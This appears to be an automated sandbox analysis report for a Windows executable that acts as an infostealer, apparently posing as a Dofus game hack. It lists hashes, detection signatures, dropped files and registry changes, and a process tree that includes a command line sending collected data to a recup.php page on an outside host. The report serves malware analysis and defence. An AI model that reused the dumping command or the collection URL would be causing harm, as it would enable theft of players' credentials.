Analysis
-
max time kernel
72s -
max time network
143s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
03/12/2022, 16:05
Behavioral task
behavioral1
Sample
652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe
Resource
win7-20220812-en
General
-
Target
652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe
-
Size
220KB
-
MD5
6e1218085443b5d66f82cb98f9cca0b5
-
SHA1
729ceb8815d87ef87a19a2bcdcba63ca35e85283
-
SHA256
652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476
-
SHA512
37b5016e6dbee243b8480c817457d72fb9a0cb78a725c010dfa50b219de560f44bb60e021abd5b55cbc62886581315b8c5aa1d1c645602512040e3c8b04de452
-
SSDEEP
6144:EB9gvxc8jCA4AnyDfbmtezMP3P5HXt73:1eTMyDKtezMhHd
Malware Config
Signatures
-
Nirsoft 1 IoCs
resource yara_rule behavioral1/memory/1472-58-0x0000000000400000-0x0000000000425000-memory.dmp Nirsoft -
Executes dropped EXE 1 IoCs
pid Process 1472 225488.exe -
resource yara_rule behavioral1/files/0x000c0000000054a8-56.dat upx behavioral1/memory/1472-58-0x0000000000400000-0x0000000000425000-memory.dmp upx behavioral1/memory/828-59-0x0000000000400000-0x000000000047B000-memory.dmp upx behavioral1/memory/828-61-0x00000000020A0000-0x00000000020C5000-memory.dmp upx behavioral1/memory/828-63-0x0000000000400000-0x000000000047B000-memory.dmp upx -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\225488.exe 652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe File created C:\Windows\225488.txt 225488.exe File created C:\Windows\652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe.txt 652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7EF06C31-75A3-11ED-A674-466E2F293893} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0564d62b009d901 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000006304bda07ad0c746a2e9e77cb38c8677000000000200000000001066000000010000200000004e4ff9258c5cbdf92e41b522e4aee1686f2a0d78da1bd187d1b315bfc292b17e000000000e80000000020000200000005b9b56c6de6faab8c646cdfdef266af6e43e1213f3eae6f3c4626dc29e71f0b02000000004080fb1d132ae5bfdf11a89321ed0803f17f91ebd2201a284ee63fe4687578f40000000f18993e45f6faf0ebc7d6caf1bc5d7ce666fa17132efeb1e7311c364bd3cd213e62eb18868aaceb683ac9395c02fd2f1cbd43f813dbce9d42cb0445774a38199 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000006304bda07ad0c746a2e9e77cb38c8677000000000200000000001066000000010000200000000cfbdcca10697c71b358d568cebe1d0516b63db0a0717aee498c0c0fd618b521000000000e800000000200002000000077f6765c9c86d9b2b32fd2541943f16b23861e92039bfee47a531aaafac7dd4e90000000b098c090aab0b95b880ccce3594f030b77b50ec7cddbd22e84bfb70b03036c00b22bf29bff22e6ae091c9004727b373eedbeb7568384a0c9c59199fccf77dd0dec6123af21b1a42aee3c3f524cab20550bdf971dc1aede0e413d4e814f123ee47751d37d011f083b224772ac5a358d5b2c0a794e860c6270a1bcd393f70a838f8e4eb56498f3b4ef76616991c3368e53400000005375788a09c6c0c65e62d030206c7f9e59b5cc93e676ecfe9caf1d546f11b1a4681e9f3c35b2defc1dad2159cf4bf1dbf5062ed8ed864789190a0ce1a2930448 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "377123034" iexplore.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1472 225488.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1680 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1680 iexplore.exe 1680 iexplore.exe 1112 IEXPLORE.EXE 1112 IEXPLORE.EXE 1112 IEXPLORE.EXE 1112 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 828 wrote to memory of 1472 828 652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe 28 PID 828 wrote to memory of 1472 828 652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe 28 PID 828 wrote to memory of 1472 828 652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe 28 PID 828 wrote to memory of 1472 828 652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe 28 PID 828 wrote to memory of 1680 828 652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe 29 PID 828 wrote to memory of 1680 828 652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe 29 PID 828 wrote to memory of 1680 828 652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe 29 PID 828 wrote to memory of 1680 828 652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe 29 PID 1680 wrote to memory of 1112 1680 iexplore.exe 31 PID 1680 wrote to memory of 1112 1680 iexplore.exe 31 PID 1680 wrote to memory of 1112 1680 iexplore.exe 31 PID 1680 wrote to memory of 1112 1680 iexplore.exe 31
Processes
-
C:\Users\Admin\AppData\Local\Temp\652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe"C:\Users\Admin\AppData\Local\Temp\652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:828 -
C:\Windows\225488.exe"C:\Windows\225488.exe" /stext C:\Windows\225488.txt2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1472
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://dofushack2.myartsonline.com/recup.php?actif=Le_serveur_Dofus Conf_est_activé2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1680 CREDAT:275457 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1112
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
608B
MD502cf93a6bda4834be70a068398d4e70a
SHA17ec414bdb7c419ca8fa3edef4f8cbf9000d511a9
SHA256c76f2629f4ecb9fba426610916af3ef68c479d6d95f0c08ca69f58894f7979be
SHA512aacabc3ff5a8d5fd0182ea2516c9588fe27408c49458d261ca0011dd7b663755fb2d37d5ded3986159e908fa6ea7ba76bb864ea594af1dac235137b83de5f328
-
Filesize
63KB
MD5113417b6a1a108eb22337602661e7a59
SHA1c89f17a24058a33851d02561bcdae48f327c18c5
SHA256152374899c00e31678b5d627e4d05ff877f59cce3319cc024c25cf3bf40302a2
SHA512182732b7853e0a28c73ea44a7e0c2ada764d74bb9010358d78ae4edd7829140d73af7d1ad7544a973ccff6f442593d5697ae792f604f410e8a35c9d18a680e88